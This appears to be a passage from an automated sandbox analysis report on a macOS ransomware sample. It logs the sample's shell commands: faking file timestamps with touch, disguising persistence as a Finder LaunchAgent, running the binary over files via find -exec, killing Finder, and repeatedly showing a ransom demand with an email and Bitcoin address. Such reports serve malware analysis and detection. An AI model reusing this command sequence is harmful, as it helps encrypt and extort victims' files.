Source: /usr/bin/osascript (PID: 753)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 753)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 756)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 756)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 759)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 759)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 762)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 762)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 765)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 765)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 768)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 768)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 771)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 771)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 774)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 774)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 777)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 777)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 780)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 780)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 784)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 784)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 787)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 787)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 790)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 790)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 793)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 793)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 796)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 796)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 799)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 799)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 802)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 802)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 805)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 805)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 808)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 808)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 811)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 811)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 814)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 814)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 817)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 817)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 820)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 820)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 823)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 823)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 826)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 826)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 829)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 829)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 832)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 832)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 835)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 835)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 838)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 838)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 841)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 841)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 844)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 844)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 847)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 847)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 850)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 850)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 853)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 853)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 856)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 856)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 859)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 859)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 862)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 862)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 865)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 865)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Explicitly modifies time stamps using the "touch" commandShow sources
Source: /bin/sh (PID: 698)Touch executable uses -c (no creation) and -t (set access/modification time) options: touch -ct 201606071012 /var/root/Library/.FS_Store
Source: /bin/sh (PID: 699)Touch executable uses -c (no creation) and -t (set access/modification time) options: touch -ct 201606071012 /var/root/Library/LaunchAgents/com.apple.finder.plist
Source: /bin/sh (PID: 730)Touch executable uses -c (no creation) and -t (set access/modification time) options: touch -ct 201606071012 /var/root/Library/LaunchAgents/com.apple.finder.plist
Source: /bin/sh (PID: 731)Touch executable uses -c (no creation) and -t (set access/modification time) options: touch -ct 201606071012 /var/root/Library/.FS_Store
Many shell processes execute programs via execve syscall (may be indicative for malicious behaviour)Show sources
Source: /bin/sh (PID: 688)Shell process: sysctl hw.model
Source: /bin/sh (PID: 689)Shell process: grep Mac
Source: /bin/sh (PID: 694)Shell process: sysctl -n hw.logicalcpu
Source: /bin/sh (PID: 696)Shell process: sysctl -n hw.physicalcpu
Source: /bin/sh (PID: 693)Shell process: grep 2
Source: /bin/sh (PID: 697)Shell process: mv /Users/vreni/Desktop/macRansom /var/root/Library/.FS_Store
Source: /bin/sh (PID: 698)Shell process: touch -ct 201606071012 /var/root/Library/.FS_Store
Source: /bin/sh (PID: 699)Shell process: touch -ct 201606071012 /var/root/Library/LaunchAgents/com.apple.finder.plist
Source: /bin/sh (PID: 700)Shell process: launchctl remove com.apple.finder
Source: /bin/sh (PID: 701)Shell process: launchctl load /var/root/Library/LaunchAgents/com.apple.finder.plist
Source: /bin/sh (PID: 706)Shell process: sysctl hw.model
Source: /bin/sh (PID: 707)Shell process: grep Mac
Source: /bin/sh (PID: 712)Shell process: sysctl -n hw.logicalcpu
Source: /bin/sh (PID: 714)Shell process: sysctl -n hw.physicalcpu
Source: /bin/sh (PID: 711)Shell process: grep 2
Source: /bin/sh (PID: 715)Shell process: find /Volumes /var/root ! -path /var/root/Library/.FS_Store -type f -size +8c -user root -perm -u=r -exec /var/root/Library/.FS_Store {} +
Source: /bin/sh (PID: 717)Shell process: whoami
Source: /bin/sh (PID: 720)Shell process: sysctl hw.model
Source: /bin/sh (PID: 721)Shell process: grep Mac
Source: /bin/sh (PID: 726)Shell process: sysctl -n hw.logicalcpu
Source: /bin/sh (PID: 728)Shell process: sysctl -n hw.physicalcpu
Source: /bin/sh (PID: 725)Shell process: grep 2
Source: /bin/sh (PID: 730)Shell process: touch -ct 201606071012 /var/root/Library/LaunchAgents/com.apple.finder.plist
Source: /bin/sh (PID: 731)Shell process: touch -ct 201606071012 /var/root/Library/.FS_Store
Source: /bin/sh (PID: 732)Shell process: killall Finder
Source: /bin/sh (PID: 736)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 740)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 743)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 747)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 750)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 753)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 756)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 759)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 762)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 765)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 768)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 771)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 774)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 777)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 780)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 784)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 787)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 790)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 793)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 796)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
